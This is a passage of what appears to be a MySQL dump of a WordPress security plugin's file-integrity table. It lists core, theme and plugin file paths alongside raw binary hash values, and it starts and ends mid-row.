��Q�XZ\r���','',0,'?'),('ǖ��d�!s<X��Я','wp-content/plugins/wordfence/modules/login-security/classes/model/settings/wpoptions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*�1{,˾�ʂ��','<�G���$�U+�k�L>\0h�ahB��S�-�','',0,'?'),('쩯��b�/�y;�f','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-video.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�nh��e�S�,����!','��,GK��f���o�a��t}߆#Z��s�v�\'�','',0,'?'),('�*沫�Q�N','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-textarea.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oV�7PR~׬���ai','b�\Z�����s#:�*�\\���\'�i@���qa','',0,'?'),('�Ĉ��ψ�x�>�H','wp-content/plugins/wp-cerber/assets/flags/sd.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1y����s�)�x�','�	�ZL���2���H��j�o�i�����','',0,'?'),('��y7��MA�@���','wp-includes/widgets/class-wp-widget-rss.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9aP��,\n0��cHt��','�t�e�������wn2�v�\0o����e��2','',0,'?'),('�_)0d|�6_�;n','wp-includes/js/dist/rich-text.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y$�Bx!�u��񥰂�w','��(��/�,gw�&tS��O}���E|�ʂ�','',0,'?'),('>}�/K����q�%','wp-content/plugins/wordfence/css/wf-ionicons.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Al��s���j�⯃','ג��4�ˮ�v�����M�`�V��Z�','',0,'?'),('��<��i����Q\0','wp-includes/js/dist/reusable-blocks.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^�ގ�g��Ts؉f�','zt\r��j�Z\Z��H�ͼċ�!f����;��','',0,'?'),('�`&%eF�g����d','wp-content/plugins/wordfence/models/block/wfBlock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<�1�g-M��@��','�Eϑ7���^\\0��uy|�]�J���\0�4��z�,','',0,'?'),('�:8�Ia��øl�m','wp-admin/includes/class-ftp-pure.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T&�}�\\3��J�� \0','�\nS�{U��Cdz$����y���a|8�[','',0,'?'),('�[���������R','wp-content/themes/twentynineteen/template-parts/post/author-bio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\\J��w���','2� ��ă���`�|��K 6<#:Gׯ��s','',0,'?'),('����KqM���{���','wp-admin/css/dashboard.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3T8�orO�0�t=+Z%','������D�E����bF��Xx騞���','',0,'?'),('��sݜ�Þ3�����','wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha-threshold.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#��7Ih�!���_�','�y�۹�����������!�H���HGH','',0,'?'),('�{xZ�c�\"�hb�?�','wp-includes/js/dist/dom.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���k��\"���MM�','D�I�&�\"�H��-���Q࣋�Fzֱ�ev�','',0,'?'),('�TB��O>�v2��}Ea','wp-includes/SimplePie/Locator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�3�y�%14���','<���ms�4�3p-I�/�8\'J�� }.�','',0,'?'),('��W�MF`3��$��','wp-includes/rest-api/fields/class-wp-rest-term-meta-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y^�������','Y	Q�FX��2�2�FW���)���fKSf�','',0,'?'),('�U��b�a(���','wp-content/themes/magazine-hoot/include/admin/images/content-block-style-4.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ҽx=�|࠸H@�^j(�','�6��aɗ�9U�I+�X��\'��J��u0N�lG','',0,'?'),('�-ФQ�1Ц\r �','wp-content/themes/twentynineteen/sass/variables-site/_variables-site.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G\0��\\t4����E�','�,%d:?�-�ǯM�!k���gF6�ݱ���R�lj','',0,'?'),('��*�7\r��?�','wp-includes/class-requests.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X@�?i� Xc����','���$��\r7�U���M����]���g6‡�>C','',0,'?'),('L��e`d�˻��W','wp-content/plugins/wp-cerber/assets/flags/je.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('�l1�r$~�A�)','wp-content/plugins/wp-cerber/assets/flags/as.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��X�/����Z�3�','��UŰ�\r�^�W�}�Ux\"�C�@�Scu�l','',0,'?'),('�of?�3�P�1�\"�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g\"̤/O���Y��\'','�8�e�T�et\r j�P�/��J���<^�rӥz','',0,'?'),('F��e���}�(��','wp-includes/js/jquery/ui/dialog.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']2�z�L!E��,�C\Z','���|\r�Ce>�/k˪�\"E�0�݀V�L�','',0,'?'),('N�\0f��~;I���','wp-content/plugins/wp-cerber/assets/flags/bm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y��g��¶Mn�z�','��<������@ H�*��eթ�G�)�-CIԲ^','',0,'?'),('W�׾�5^��l_�_#�','wp-content/themes/twentynineteen/sass/typography/_typography.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��>�7�2��n��t','��nek�o@�l�_���ky~�YWŢA���','',0,'?'),('i1��E~N�I�A͔��','wp-includes/Requests/Cookie/Jar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0_��&p��\"4�\\�','c��!�#B�i*+\"�\r�n���Iƈ�XÉ��w�','',0,'?'),('s♼{DR�[�k�1�I','wp-content/plugins/wordfence/images/logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�zF��ހW�\rl�~6','V�{��Q9�V	����J	X�q���ڀc�','',0,'?'),('����X/��\0��	','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/sqli.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','On�4�r���\'f=','�b�����*�9Y�[]�\rᕂ\'�yԩ�e��','',0,'?'),('�N3M�\n��S��0j','wp-includes/js/dist/block-library.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`\\{�O�\Z�sl=��','��Pu6��Qi��D�9ï��_�iZ�G��Ad��','',0,'?'),('�x(�ťܺ�.���Շ','wp-includes/class-wp-session-tokens.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9]�K�UJW�*��h�=','���4�\ZQuA^ء��j򬪎$M��0�\0','',0,'?'),('Ԓ��A����r��^','wp-includes/js/wp-custom-header.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+,�!�ڊLӺ~ν7�','��E�zk;3K�*X$���i���q��n��','',0,'?'),('�^0p����k����M','wp-includes/css/dist/nux/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ip����8\0p���','���������3Bk~�x*N���K}�mǧ߸n�','',0,'?'),('�S	����g	N�d','wp-content/plugins/wordfence/modules/login-security/classes/controller/wordfencels.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6_DB��NI�9���Ŷ�','���~DIb�xb{�IdO�.C�����:z/�D5�','',0,'?'),('���h]��C���A*','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'I�˞aFtz\\�Ǯ','���Ҭ�\ZADs���5����?���D�A/<�:','',0,'?'),('�0ܚ�Z�I�丱N','wp-includes/sodium_compat/src/Core/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�U巃�� qD�F��H','���Ԧ�!���ӢtL�k.�\"1��Cm�Kg�','',0,'?'),('�D�zZ���E��;��','wp-content/themes/magazine-hoot/include/admin/images/archive-block2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O/��~���h��tD�','������`1���o�+3��@�P!��js�','',0,'?'),('�3ƹܕj�bi�Υ�','wp-includes/customize/class-wp-customize-nav-menu-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@V{R#8�7n�n\n�','��a�H����Muyw?�h:�B��<=��,##�','',0,'?'),('�	wE��r��} �','wp-content/plugins/wp-cerber/assets/flags/gq.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','׾�\r�>.ⶱ���G','�d����^f�r��=�mM���Y��,���','',0,'?'),('I��y��t�$O�5','wp-content/themes/magazine-hoot/hybrid/extend/images/patterns/0_preview.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.��܁W�F�����','���d\\�E;t6���g6�^�𩧉��p�8<Z','',0,'?'),('b���E�����4t=','wp-content/plugins/wordfence/views/dashboard/options-group-alert.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�̻o��wG>p','�I�`I^{�Pנh�Q��e:sG^��8�sĚ','',0,'?'),('��,‚=9���h�6K�','wp-includes/js/jquery/ui/draggable.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:2��g9�tL�D�','��Cu�o.t�?�xd�x�CK�6�Ηp_�','',0,'?'),('��un�Rـ���:9��','wp-content/plugins/all-in-one-wp-security-and-firewall/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\\"*��!83�+','��Ӻ:�B��ֶV�Ɍ)�Nɳ��p�','',0,'?'),('�\0Ƭ����#���(�','wp-content/themes/twentytwenty/package-lock.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>���=AG� ��\0�076','}Jz��0�$�1��Ǜb�����#,=���','',0,'?'),('��]�Ɖ	��e','wp-content/themes/twentytwentyone/assets/css/style-dark-mode-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��g�5�p�McHe{','�3ڢ�;!�ٺ��O���h��=rR�gV��/','',0,'?'),('Ԕk�+0�o����','wp-content/themes/magazine-hoot/hybrid/extend/js/admin-widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y��@{��W�)�\n','-^��T\n�u�Nĭ�꣇j���M���a','',0,'?'),('�0���զ����','wp-content/plugins/wp-cerber/assets/flags/gw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*qWM����f2�c','d�n�;L�m%��\"NA�oZE!���J�_͆�','',0,'?'),('��>�/ᡇ_����','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l([qא��D#��','\\sٶ�hb�2.;�m`F��r^&�H-w	�yV�~','',0,'?'),('�&UX\r�L4{����','wp-includes/js/utils.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t��0�`ߣ���MVi`','�js�@Vna�v�t\'ȀD��,݆���T;','',0,'?'),('��ԞX�[�`?��^','wp-includes/block-patterns/large-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`���3��\0�]j6?>','��b�`&h�2��)V�KF}Ո�m�?*f�搭','',0,'?'),('\Z֧��\\\Z�h�i','wp-includes/js/dist/blocks.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' */ĭ�b��@m�0','����˴kS򢱼h�4���!�3:�Tæ�~DM','',0,'?'),('\ZO�3F5K�;�@ �','wp-content/plugins/wordfence/modules/login-security/classes/controller/cron.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@�q\\�}����[�','�[�T�n�Ejd�(�$�:!�h�Ν\0�s�><','',0,'?'),('\Z&�cR�< FiC�','wp-content/plugins/wordfence/modules/login-security/views/options/option-text.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ƥܐ�W^�[�g�','�dL�����cK~=0jE�]�����~\"�','',0,'?'),('\ZN\Z�`i̳%�ج0','wp-content/plugins/wp-cerber/assets/flags/cn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A���-V�|֬S���','j�_�\r49�>�x+E�X��H��dF���K�`','',0,'?'),('\Z\Z��L�X�?T鍦','wp-content/themes/twentytwentyone/assets/images/young-woman-in-mauve.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','̦\\����l��G?','�;�}pSy���,7sa.�T��ˌO1q\'�5[��~','',0,'?'),('\Z��_eym�\Z�v��/\\','wp-content/plugins/wordfence/modules/login-security/js/admin-global.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�LgD5w\'|�IGV��5','�}њ@�PF�)M���$��j���p{e','',0,'?'),('\Z�t��.�2q�]a','wp-content/themes/magazine-hoot/hybrid/extend/extensions/widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�[]֌󠧎�m�K','����Tid�Zs���^J�<��>Ճ���r��','',0,'?'),('\Z�����L6N�1�;8�','wp-content/plugins/wordfence/modules/login-security/views/page/section-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"���w^\n���k�6','�!�5�@�a�6t�o�5(D�s���\n��K�f','',0,'?'),('\Z�;5�(��O�O�R�','wp-content/plugins/wordfence/lib/dashboard/widget_content_countries.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ǜ����lm�D!','�\'�9�\r9�\0o|��\Z������|����0K','',0,'?'),('\ZŴԭ�xvw�E\nv','wp-content/plugins/wp-cerber/assets/flags/mk.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��x���Zx��e��','Ŷv�ew��s��֝�wx�YԌ[@eQ�C�j','',0,'?'),('\Z�`��c�\"�q]��\'O6','wp-content/plugins/wordfence/js/wfi18n.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i&XDE���p/N�','GU	��*��k�P,�:�?+}x�Hb�5���#�','',0,'?'),('\Z��{l46-��jT99','wp-content/plugins/wordfence/js/knockout-3.3.0.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_��B8lc^��','5�J�9h��ALg��@�`�uw�o��3��\0I>','',0,'?'),('\Z����)qtsCI9','wp-includes/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.���$[L�$�۫�','sF���z ��v�j���*�	Q��w�0�ov','',0,'?'),('\Z�y��8R#O�y��','wp-admin/css/nav-menus-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+f~�Da�أv|�/�','%tK�r���t��M��b��n:�a����>E','',0,'?'),('\Z��\Z:\\��Rf�P�~3','wp-includes/class-wp-metadata-lazyloader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I^�P���;$�+\"�','^2��)E>X���4�:��U&�߳;���!e','',0,'?'),('\Z�UE�s(��#E�p','wp-includes/images/smilies/icon_mrgreen.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$_��u�X|I%~$','!B���I1�mV�-���|ј�X5D�8���h�','',0,'?'),('\Z���/�̓��T%�g4','wp-includes/js/jquery/ui/effect-drop.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���閴�u)�B���1�','��v��h��d���L�V�y􅊖�^n\"�ّ\0]p�','',0,'?'),('E3=X	*�I8$�','wp-content/themes/magazine-hoot/images/modulebg.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����H��E�y','�MN6��1xfı��kK�]ީ���E��g','',0,'?'),('$�P�`��\0g�X�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yF“\\����2���','2k�s��\\>��RI:nH�ȿDm�!zz���','',0,'?'),('-��c�<���@�VsZ�','wp-includes/js/api-request.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9����߿G7p6{�g','�d�6Q\\����f�:�����G`��j1V�','',0,'?'),(':�b�boŝU�pA��a','wp-content/themes/magazine-hoot/include/admin/images/archive-small.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��$���\'�gF�n�','��%`�Ь�Zz�h�X�����״�U�|�X9�','',0,'?'),('Ryr�|���o>���>','wp-content/themes/twentytwentyone/assets/css/style-editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c*�ΌƝ�+�Wi�','�W/�����%=M]ZX�>\n>.\0x�5#^��','',0,'?'),('k����7|d����T;','wp-content/plugins/wordfence/modules/login-security/views/options/option-require-2fa.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�t�J��?&B�I�_�','D*��\nS��A�w��5e�\Z��ӔM2���','',0,'?'),('�y���!�\0pZ�[A','wp-includes/js/mediaelement/mediaelement-and-player.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�iz+*;)��E�','�-5(��:�oQ[̪���\\�\nm~�CP','',0,'?'),('�s�‹�=����\0','wp-content/plugins/wordfence/modules/login-security/js/jquery-ui-timepicker-addon.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','89�\"��zz��Vv*��]','�ۆ%%l�:J�f<�bq��P���Pt˯}ߝ\"�f','',0,'?'),('��E�ȖqȊ?2�H�','wp-includes/js/dist/api-fetch.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-zLܗ�G��3�|4y','e�9����x^h�Ǔ|B�1u��2t�\'�Y�\n	','',0,'?'),('��<b���!ž�','wp-content/plugins/wp-cerber/assets/flags/ge.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Aw�J#ܿ�d��F','��6��o�M�X��ݕ�D���֖M�+','',0,'?'),('ֻE\n�<�B�[�,','wp-includes/class-wp-ajax-response.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o6�)�Q�\"Sσt�.H�','��[��$���g�nM!^\\���9t�t��>Z�','',0,'?'),('�m��n9�F�6�','wp-admin/css/admin-menu-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��i�0.���f��','C�X�R�\Z��)GU+LA�� �$�:�1�e�','',0,'?'),(')�M��^�ûoz�','wp-admin/images/loading.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@�ל�x>c������¢','�<\0Ѕҩ��هqU%��G��7r�\\�*��2J','',0,'?'),('4%�IH�O��ʰ�L','wp-includes/css/media-views.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w�\0�]������	�-','�{&B>�:]�\n��a��m����c�[zk!�','',0,'?'),('<B��ʱ�A51ӱ','wp-content/plugins/akismet/_inc/form.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�4�l*��&��i','�MB�1�QwoX4bx��c)@D�˥��k','',0,'?'),('C�/�;)��ّ�o','wp-admin/js/comment.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xc�T��#�Δ�(�','�Pi<l��D%�J{d�w�������5/','',0,'?'),('H��~�\n��x����|','wp-includes/js/dist/token-list.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�r�o��\Z�����#','r�����a����D����*�Q�R��4A�','',0,'?'),('T�gslF��ʞ�Ly','wp-admin/js/set-post-thumbnail.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�P�N�H�9e�@I','e}#����n�q�J�rJ��Q<d��Z�K�4','',0,'?'),('Y ����S��z�X^','wp-content/plugins/wp-cerber/assets/flags/bj.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z��̂(,�ߨP}r��','�`	�U�Y�ģ���Ç�/�5��T��\"5','',0,'?'),('a�@�WrQw��Z\n.�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ܑz�g<N��\n?o6f','���R����Eg�X3��JAc��!a�_��S{','',0,'?'),('z�|*6�S\\5��3','wp-content/plugins/wordfence/lib/wordfenceScanner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l2�Ǘ�yf[CZ߈G','H׶�mb�(���f�>MX��=�W��|��ٿx','',0,'?'),('�\n$z�X�`�1Bw','wp-includes/js/tinymce/plugins/charmap/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\��5^����','[�B�\Z,;��j�fe�MU�j|)�rv��>U�F','',0,'?'),('��=b�6��hs���t','wp-admin/ms-themes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:1R]	l�I��!#_J','7�E��H����Pu�����Z�b��G','',0,'?'),('��\'��FE�A�vQMv','wp-content/plugins/wordfence/lib/Diff/Renderer/Abstract.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>\r��5]xVI�\'�i�','��G��݅\'�!���Y�E�3��P5ad��M��','',0,'?'),('���>,�\r��h�Fp�','wp-content/themes/magazine-hoot/include/admin/images/posts-list-style-3.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C�s�)PtT�G�','�x������_ƸU�����K�T\'ؾ8��S','',0,'?'),('�����>����p�\rB','wp-content/themes/twentytwentyone/assets/sass/06-components/pagination.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��d�N#vk�s��z','w;�[f�]X��Þ&�����y2,����F','',0,'?'),('�^�u[�p}`B��W1','wp-includes/blocks/table/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����̀)#\rS� ��','�q#�.Z!�g�l���讍T�\0�u�\'EA�?�','',0,'?'),('��º��\06�R&q','wp-content/plugins/wp-cerber/assets/flags/lc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?x2\Zˁ%��*�','��dV��d����5�w$�E�,Ư�{l','',0,'?'),('�k0B��a��`�','wp-includes/customize/class-wp-customize-nav-menu-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��,�#Y�bu3�����','�Ӻ�f����\r���o!�cY	�o��\r����','',0,'?'),('����^�cm]�s~','wp-content/plugins/wp-cerber/nexus/cerber-nexus.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ced]@�>�t�Ɇ��','JSu�j�F#�e��҇p�U�a�;�S�','',0,'?'),('�\r)�51T�� ��o','wp-content/themes/twentytwentyone/inc/block-styles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t@/�ߢ�@e��R','��r�4����w�����zZ�Z�S$�','',0,'?'),('ܟ�ҿB∶����','wp-includes/js/dist/media-utils.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������ϱ݂I','����Ȗ�riP]�o���+�g֯�*?=P','',0,'?'),('�-=Q�Cw�tnL�#','wp-content/plugins/wordfence/lib/wfBrowscap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\r�e.�����b��','�Hz�n���O�#�/�t�ɚ\"���U ���A�i�','',0,'?'),('\n��O�_��;]/^��','wp-includes/images/down_arrow.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���V�~�o�YnG~_u','��h�8ɧ���p�u�{�9������J���','',0,'?'),('ν�}�V�+�tB�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��꤀�x�٠�%�cl','N�8,�c����ae����Οi<5p$���','',0,'?'),('G_bc�.,]&���','wp-admin/js/image-edit.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\'�L�\n�r�)�L','o9J�B�{2[�Je\r����@q��ؘ�Դ�lD�','',0,'?'),('Kv�$T�MR����=�','wp-includes/css/dist/edit-post/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����n	�VQ�H��','Y��^�Up���yx.ΕP��\0���\Z�����','',0,'?'),('2J0���xYr���','wp-content/themes/twentytwentyone/assets/sass/05-blocks/preformatted/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�Q[릶������','�)�t1��@�1\0��ו����KW���\0���','',0,'?'),('Kg\Z�P�F\\�,�f','wp-content/plugins/wordfence/modules/login-security/js/jquery.qrcode.min.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Թ���Xp`me<','wP\0�p�zuYDS�z(W�ߥ��P�3$S����','',0,'?'),(']���(�7�^����U','wp-content/plugins/wp-cerber/assets/flags/zw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\�^�~����E,Tl','S��Y�2�r�5��S�a�J�\"��tJ�@ArC�','',0,'?'),('fMx���	�+9�U�','wp-admin/js/customize-widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��›|���\Ze�+J~','��h��v�ԲF:�Zؿ�Bd`����Y���','',0,'?'),('�%��\\��MA����','wp-admin/images/wordpress-logo-white.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��qP�C��-SPD�','e�4�E��?�&�DsA���ʬ�;�)@�Xɒ','',0,'?'),('����J�}F��E\0�9�','wp-content/themes/index.php',0,'gD,V�=\\�bP','gD,V�=\\�bP','k�����~	��UH\Z��x�P��Ā��<��;X�','',0,'?'),('�=�}C���i��HT','wp-admin/network/profile.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�3���@%�c ','�\\H�.7���7QtUw�ݰAK,�$A��!��Lz','',0,'?'),('�\\���O�ZLg\rm','wp-content/themes/magazine-hoot/template-parts/content-archive-block2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\\c6�\\ev���jk','<�O믂�H����w��i���xa�خ�u��*T','',0,'?'),('��g+������,c�','wp-includes/block-supports/colors.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ef�1!9vC8�:(��\'','Uc�OТ��0;�[�z\'��أdP��+�j���0','',0,'?'),('�g��I�!٭���_�','wp-includes/ms-blogs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','YYw_s簃@	DE�m','�~ۃG��,,?��0��v��f��UӧN��iK','',0,'?'),('���t�DX�m\0#�(�','wp-includes/customize/class-wp-customize-nav-menu-locations-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�D��]σ��2+fX','Ѵg�h��m�s�ꄑ��-vmQ�Ij�\Z]sQT9�m','',0,'?'),('��]/~���q��XŎE','wp-includes/js/jquery/ui/button.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k{�qz�uo�>���','8�v�J.�OA�z��A)�HJe�f�B�,��z','',0,'?'),('���L?\n�\n���x��@','wp-content/plugins/wp-cerber/assets/flags/al.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#����S�{r<�','����G�U0<>�.]fX�[I���\0����7','',0,'?'),('B�@�R*G�xF4N}','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/XSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'�_�?Sş\Z]�y�','�6��[-�,9YR�r�\rY\"-��an�6$�','',0,'?'),('R�\\�&��T	�|`','wp-includes/class-wp-user.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��b�Zd��	��','���mA�QW,�?�;��w�FT񎧳\\>��','',0,'?'),('ynm�;�/�UsK	��','wp-includes/css/wp-embed-template-ie.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7{WP�L�{H���I�','\\aWq1��+��Я�o�L�Y\0�„K���%<','',0,'?'),('|�&;�r�Ls5��','wp-admin/includes/comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I|��lu�D�','�� \r���B�%�F�V}[�j�7CF�A�','',0,'?'),('���Ye�.�0s��','wp-admin/includes/class-wp-comments-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o�Kt�Jr�\"�-*�','7�d�i}k�4��+)�[��-L�4�uR_O�<Ѩ�','',0,'?'),('�A�o\r�ZԔ_�t','wp-content/plugins/wordfence/views/waf/waf-uninstall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��~�xT-4�ZK��3','�>|k��\\~/n8�	